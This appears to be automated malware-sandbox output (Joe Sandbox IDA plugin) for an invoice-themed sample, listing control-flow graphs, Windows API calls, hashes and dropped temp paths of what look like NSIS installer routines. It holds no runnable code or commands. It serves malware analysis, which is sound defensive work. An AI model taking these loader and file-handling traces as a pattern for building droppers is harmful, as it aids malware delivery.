                                control_flow_graph 146 404b0b-404b22 147 404cb4-404cba 146->147 148 404b28-404bf6 GetDlgItem * 3 call 4054de call 405810 GetClientRect GetSystemMetrics SendMessageW * 2 146->148 150 404d00-404d06 147->150 151 404cbc-404ce2 GetDlgItem CreateThread CloseHandle 147->151 172 404bf8-404c0a SendMessageW * 2 148->172 173 404c0c-404c12 148->173 152 404d31-404d37 150->152 153 404d08-404d12 150->153 155 404ce8-404cf1 call 405736 151->155 157 404d39-404d40 152->157 158 404d7f-404d82 152->158 153->155 156 404d14-404d2f ShowWindow * 2 call 4054de 153->156 165 404cf6-404cfd 155->165 156->155 162 404d42-404d4c 157->162 163 404d55-404d6a ShowWindow 157->163 158->155 166 404d88-404d8c 158->166 169 404d4e-404d53 call 405933 162->169 170 404d7b-404d7d 163->170 171 404d6c-404d76 call 405d15 163->171 166->155 167 404d92-404daa SendMessageW 166->167 174 404ec0-404ec2 167->174 175 404db0-404de2 CreatePopupMenu call 405e95 AppendMenuW 167->175 169->155 170->169 171->170 172->173 178 404c14-404c1c SendMessageW 173->178 179 404c1e-404c37 call 4054f5 173->179 174->165 187 404de4-404df4 GetWindowRect 175->187 188 404df8-404e14 TrackPopupMenu 175->188 178->179 185 404c39-404c4d ShowWindow 179->185 186 404c6b-404c91 GetDlgItem SendMessageW 179->186 189 404c5a 185->189 190 404c4f-404c58 ShowWindow 185->190 186->174 192 404c97-404caf SendMessageW * 2 186->192 187->188 188->174 191 404e1a-404e26 188->191 193 404c60-404c66 call 4054de 189->193 190->193 194 404e2e-404e48 SendMessageW 191->194 192->174 193->186 194->194 196 404e4a-404e74 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 194->196 197 404e76-404ea2 SendMessageW 196->197 197->197 198 404ea4-404eba GlobalUnlock SetClipboardData CloseClipboard 197->198 198->174
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00404B6C
                                • GetDlgItem.USER32(?,000003EE), ref: 00404B7C
                                • GetClientRect.USER32(00000000,?), ref: 00404BB9
                                • GetSystemMetrics.USER32(00000002), ref: 00404BC1
                                • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404BE3
                                • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404BF2
                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C00
                                • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C0A
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C1C
                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C40
                                • ShowWindow.USER32(00000000,00000008), ref: 00404C52
                                • GetDlgItem.USER32(?,000003EC), ref: 00404C74
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404C88
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CA3
                                • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CAD
                                • ShowWindow.USER32(00000000), ref: 00404D22
                                • ShowWindow.USER32(00010432,00000008), ref: 00404D27
                                • GetDlgItem.USER32(?,000003F8), ref: 00404B8C
                                  • Part of subcall function 004054DE: SendMessageW.USER32(00000028,?,?,00405313), ref: 004054EC
                                • GetDlgItem.USER32(?,000003EC), ref: 00404CCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000583F,00000000), ref: 00404CDB
                                • CloseHandle.KERNELBASE(00000000), ref: 00404CE2
                                • ShowWindow.USER32(00000008), ref: 00404D5D
                                • SendMessageW.USER32(00010432,00001004,00000000,00000000), ref: 00404D9C
                                • CreatePopupMenu.USER32 ref: 00404DB0
                                • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DCC
                                • GetWindowRect.USER32(00010432,?), ref: 00404DEA
                                • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E0C
                                • SendMessageW.USER32(00010432,00001073,00000000,?), ref: 00404E3B
                                • OpenClipboard.USER32(00000000), ref: 00404E4B
                                • EmptyClipboard.USER32 ref: 00404E51
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E5D
                                • GlobalLock.KERNEL32(00000000), ref: 00404E6A
                                • SendMessageW.USER32(00010432,00001073,00000000,?), ref: 00404E86
                                • GlobalUnlock.KERNEL32(?), ref: 00404EA9
                                • SetClipboardData.USER32(0000000D,?), ref: 00404EB4
                                • CloseClipboard.USER32 ref: 00404EBA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                • String ID:
                                • API String ID: 2901622961-0
                                • Opcode ID: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction ID: 6359324f75213449b6abc0588f6453f91f7fc730003d35bba9c6bb800d03804c
                                • Opcode Fuzzy Hash: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction Fuzzy Hash: BEA1C5B1205704BBD320AB25DD49F5B7FADFF88750F01493EF681A62A1CB788841CB69
                                Function 6FA42351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6FA412F8: GlobalAlloc.KERNEL32(00000040,?,6FA411C4,-000000A0), ref: 6FA41302
                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FA4294E
                                • lstrcpyW.KERNEL32(00000008,?), ref: 6FA429A4
                                • lstrcpyW.KERNEL32(00000808,?), ref: 6FA429AF
                                • GlobalFree.KERNEL32(00000000), ref: 6FA429C0
                                • GlobalFree.KERNEL32(?), ref: 6FA42A44
                                • GlobalFree.KERNEL32(?), ref: 6FA42A4A
                                • GlobalFree.KERNEL32(?), ref: 6FA42A50
                                • GetModuleHandleW.KERNEL32(00000008), ref: 6FA42B1A
                                • LoadLibraryW.KERNEL32(00000008), ref: 6FA42B2B
                                • GetProcAddress.KERNEL32(?,?), ref: 6FA42B82
                                • lstrlenW.KERNEL32(00000808), ref: 6FA42B9D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                • String ID:
                                • API String ID: 1042148487-0
                                • Opcode ID: 989da479e244ec37545848fb969006e5ffba73a469fbe80a6b533ce1b6526d7d
                                • Instruction ID: dfcd6b8d679571ef63487924f27dd251ed6b01f4397d291287fa6baea8a6174b
                                • Opcode Fuzzy Hash: 989da479e244ec37545848fb969006e5ffba73a469fbe80a6b533ce1b6526d7d
                                • Instruction Fuzzy Hash: 9642A171A587029FD318CF38C94076AB7E0FF89714F044A2EE5A9D7290E778E5C58B92
                                Function 004066F4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155filestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 919 4066f4-40671d call 406613 922 406736-406740 919->922 923 40671f-406731 DeleteFileW 919->923 925 406742-406744 922->925 926 406753-406766 call 406af5 922->926 924 4068b5-4068be 923->924 927 4068a4-4068aa 925->927 928 40674a-40674d 925->928 933 406776-406777 call 406ceb 926->933 934 406768-406774 lstrcatW 926->934 932 4068b4 927->932 928->926 930 40686d-406875 call 4065aa 928->930 930->932 941 406877-40688b call 406531 call 406560 930->941 932->924 936 40677c-406781 933->936 934->936 939 406783-40678b 936->939 940 40678d-406793 lstrcatW 936->940 939->940 942 406795-4067b8 lstrlenW FindFirstFileW 939->942 940->942 955 4068ac-4068af call 405d15 941->955 956 40688d-40688f 941->956 944 406856-40685b 942->944 945 4067be-4067c0 942->945 944->932 947 40685d-40686b 944->947 948 4067c1-4067c6 945->948 947->927 947->930 951 4067c8-4067ce 948->951 952 4067df-4067f2 call 406af5 948->952 953 4067d0-4067d5 951->953 954 406838-406849 FindNextFileW 951->954 964 4067f4-4067fb 952->964 965 406806-40680f call 406560 952->965 953->952 958 4067d7-4067dd 953->958 954->948 961 40684f-406850 FindClose 954->961 955->932 956->927 959 406891-4068a2 call 405d15 call 406218 956->959 958->952 958->954 959->932 961->944 964->954 967 4067fd-4067ff call 4066f4 964->967 974 406830-406833 call 405d15 965->974 975 406811-406813 965->975 973 406804 967->973 973->954 974->954 977 406815-406826 call 405d15 call 406218 975->977 978 406828-40682e 975->978 977->954 978->954
                                APIs
                                  • Part of subcall function 00406613: lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406667
                                  • Part of subcall function 00406613: GetFileAttributesW.KERNELBASE(00425A48,00425A48), ref: 00406678
                                • DeleteFileW.KERNELBASE(?,?,00000000,75923420,?), ref: 00406720
                                • lstrcatW.KERNEL32(00425248,\*.*,00425248,?,00000000,?,00000000,75923420,?), ref: 00406772
                                • lstrcatW.KERNEL32(?,004082B0,?,00425248,?,00000000,?,00000000,75923420,?), ref: 00406793
                                • lstrlenW.KERNEL32(?), ref: 00406796
                                • FindFirstFileW.KERNEL32(00425248,?), ref: 004067AD
                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 0040683E
                                • FindClose.KERNEL32(00000000), ref: 00406850
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                • String ID: \*.*
                                • API String ID: 2636146433-1173974218
                                • Opcode ID: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction ID: ed3bb2814488eceec14de134e67e78f5f853c3bf88eed2e9a0dc8686b927a400
                                • Opcode Fuzzy Hash: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction Fuzzy Hash: E841193210671069D7207B399D45A6B76E8DF81318F12453FF883B21D1EB7C8C6686AF
                                Function 0040234F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(004089D0,?,00000001,004089B0,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                                Strings
                                • C:\Users\user\AppData\Local\Temp\fanin\Leflet, xrefs: 0040241F
                                • C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll, xrefs: 004024AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID: C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 542301482-3537113109
                                • Opcode ID: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                • Instruction ID: d428ad0e776067b9467a460b3bd0699ffb91532d5b811a166a6037c041011ccd
                                • Opcode Fuzzy Hash: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                • Instruction Fuzzy Hash: CA414A72604341AFC300EFA5C948A2BBBE9FF89314F10092EF695DB291DB79D805CB16
                                Function 004065AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                • FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: HvB
                                • API String ID: 2295610775-1619000230
                                • Opcode ID: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction ID: d1368554cb410e246732b21b307163ecdbcfd804cd616700c419d461b784c5b9
                                • Opcode Fuzzy Hash: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction Fuzzy Hash: 72D0123155A1206FC25057387E0C84B7A999F153717518B36B0A6F11E4C7348C6686AD
                                Function 00402048 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(00000000,00000000), ref: 00402061
                                • EnableWindow.USER32(00000000,00000000), ref: 0040206C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Window$EnableShow
                                • String ID:
                                • API String ID: 1136574915-0
                                • Opcode ID: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                • Instruction ID: 5e1a6dc9ac369cb9fdd6eee03f9e71544f162ca31fdf6318b4aac8087fee14a7
                                • Opcode Fuzzy Hash: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                • Instruction Fuzzy Hash: 30E026726483009FE354AF20E94E96AB768EB40326F20043FF940A40C1CB7D2C41867E
                                Function 00404F6D Relevance: 52.9, APIs: 35, Instructions: 374windowstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 199 404f6d-404f86 200 404f8c-404f92 199->200 201 40510e-405120 199->201 200->201 204 404f98-404f9b 200->204 202 405122-405162 GetDlgItem * 2 call 4054f5 SetClassLongW call 401533 201->202 203 405168-40517c 201->203 202->203 206 4051ba-4051bf call 4054c3 203->206 207 40517e-405180 203->207 208 404fb7-404fba 204->208 209 404f9d-404fb2 SetWindowPos 204->209 223 4051c4-4051e3 206->223 211 4051b2-4051b4 207->211 212 405182-40518d call 401399 207->212 215 40500a-405010 208->215 216 404fbc-404fdb ShowWindow 208->216 213 4050fa 209->213 211->206 221 405485 211->221 212->211 240 40518f-4051ad SendMessageW 212->240 222 4050fe-405109 call 405736 213->222 217 405012-405027 DestroyWindow 215->217 218 40502c-40502f 215->218 216->222 224 404fe1-404ff7 GetWindowLongW 216->224 225 405469-405470 217->225 226 405031-40503f SetWindowLongW 218->226 227 405044-40504a 218->227 229 405487-40548e 221->229 222->229 232 4051e5-4051f0 call 401533 223->232 233 4051f6-4051fc 223->233 224->222 234 404ffd-405005 ShowWindow 224->234 225->221 236 405472-405474 225->236 226->229 227->213 239 405050-40506a GetDlgItem 227->239 232->233 237 405202-405204 233->237 238 405445-40545e DestroyWindow EndDialog 233->238 234->222 236->221 243 405476-40547f ShowWindow 236->243 237->238 244 40520a-405261 call 405e95 call 4054f5 * 3 GetDlgItem 237->244 247 405464 238->247 245 40506c-405085 SendMessageW IsWindowEnabled 239->245 246 40508f-405094 239->246 240->229 243->221 275 405263-40526b 244->275 276 40526f-4052be ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 244->276 245->221 249 40508b 245->249 250 405096-405097 246->250 251 405099-40509c 246->251 247->225 249->246 253 4050da-4050df call 405933 250->253 254 4050ab-4050ae 251->254 255 40509e-4050a5 251->255 253->222 258 4050e1-4050f4 SendMessageW 254->258 260 4050b0-4050b7 254->260 255->258 259 4050a7-4050a9 255->259 258->213 259->253 263 4050c7-4050d0 call 401533 260->263 264 4050b9-4050c5 call 401533 260->264 263->222 272 4050d2 263->272 271 4050d8 264->271 271->253 272->271 275->276 277 4052c0-4052c1 276->277 278 4052c3 276->278 279 4052c4-4052ef GetSystemMenu EnableMenuItem SendMessageW 277->279 278->279 280 4052f1-405306 SendMessageW 279->280 281 405308 279->281 282 40530e-405354 call 4054de call 405cf6 call 406af5 lstrlenW call 405e95 SetWindowTextW call 401399 280->282 281->282 282->223 293 40535a-40535c 282->293 293->223 294 405362-405366 293->294 295 405385-405399 DestroyWindow 294->295 296 405368-40536e 294->296 295->247 298 40539f-4053cc CreateDialogParamW 295->298 296->221 297 405374-40537a 296->297 297->223 299 405380 297->299 298->225 300 4053d2-405429 call 4054f5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 298->300 299->221 300->221 305 40542b-40543e ShowWindow call 4054c3 300->305 307 405443 305->307 307->247
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAC
                                • ShowWindow.USER32(?), ref: 00404FD6
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FE7
                                • ShowWindow.USER32(?,00000004), ref: 00405003
                                • GetDlgItem.USER32(?,00000001), ref: 0040512A
                                • GetDlgItem.USER32(?,00000002), ref: 00405134
                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040514E
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519C
                                • GetDlgItem.USER32(?,00000003), ref: 0040524B
                                • ShowWindow.USER32(00000000,?), ref: 00405274
                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405288
                                • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529C
                                • EnableWindow.USER32(?), ref: 004052B4
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CB
                                • EnableMenuItem.USER32(00000000), ref: 004052D2
                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E3
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FA
                                • lstrlenW.KERNEL32(004211D0,?,004211D0,00000000), ref: 0040532B
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                • SetWindowTextW.USER32(?,004211D0), ref: 00405343
                                  • Part of subcall function 00401399: MulDiv.KERNEL32(00000011,00007530,00000000), ref: 004013F9
                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                • DestroyWindow.USER32(?,00000000), ref: 0040538B
                                • CreateDialogParamW.USER32(?,?,-00429D20), ref: 004053BF
                                  • Part of subcall function 004054F5: SetDlgItemTextW.USER32(?,?,00000000), ref: 0040550F
                                • GetDlgItem.USER32(?,000003FA), ref: 004053E8
                                • GetWindowRect.USER32(00000000), ref: 004053EF
                                • ScreenToClient.USER32(?,?), ref: 004053FB
                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405414
                                • ShowWindow.USER32(00000008,?,00000000), ref: 00405433
                                  • Part of subcall function 004054C3: SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 004054D5
                                • ShowWindow.USER32(?,0000000A), ref: 00405479
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                • String ID:
                                • API String ID: 162979904-0
                                • Opcode ID: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction ID: 1b19c71cd4f81cfbd26a1cf5418529817e88c436646d4b9e8708edd60e3e664c
                                • Opcode Fuzzy Hash: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction Fuzzy Hash: C4D1C070601A11AFDB206F21ED48A6B7BA8FB48355F40453EF945B21F0CB399852DFAD
                                Function 00405A19 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 225stringregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 308 405a19-405a34 call 4068c1 311 405a36-405a46 call 4065fa 308->311 312 405a48-405a7e call 406952 308->312 319 405aa1-405aca call 40595a call 406613 311->319 317 405a80-405a91 call 406952 312->317 318 405a96-405a9c lstrcatW 312->318 317->318 318->319 326 405ad0-405ad5 319->326 327 405b62-405b6a call 406613 319->327 326->327 328 405adb-405b04 call 406952 326->328 333 405b78-405ba6 LoadImageW 327->333 334 405b6c-405b73 call 405e95 327->334 328->327 335 405b06-405b0c 328->335 337 405c25-405c2d call 401533 333->337 338 405ba8-405bd3 RegisterClassW 333->338 334->333 340 405b0e-405b1c call 4065d1 335->340 341 405b1f-405b2d lstrlenW 335->341 350 405c33-405c3e call 40595a 337->350 351 405cdf-405ce1 337->351 342 405bd5-405bd7 338->342 343 405bdc-405c20 SystemParametersInfoW CreateWindowExW 338->343 340->341 347 405b55-405b5d call 406531 call 406af5 341->347 348 405b2f-405b3d lstrcmpiW 341->348 344 405ce2-405ce9 342->344 343->337 347->327 348->347 349 405b3f-405b49 GetFileAttributesW 348->349 354 405b4b-405b4d 349->354 355 405b4f-405b50 call 406ceb 349->355 361 405c44-405c5e ShowWindow call 406179 350->361 362 405cc6-405cc7 call 40583f 350->362 351->344 354->347 354->355 355->347 369 405c60-405c65 call 406179 361->369 370 405c6a-405c7b GetClassInfoW 361->370 365 405ccc-405cce 362->365 367 405cd0-405cd6 365->367 368 405cea-405cec call 401533 365->368 367->351 371 405cd8-405cda call 401533 367->371 377 405cf1 368->377 369->370 374 405c93-405cb6 DialogBoxParamW call 401533 370->374 375 405c7d-405c91 GetClassInfoW RegisterClassW 370->375 371->351 379 405cbb-405cc4 call 403cd3 374->379 375->374 377->377 379->344
                                APIs
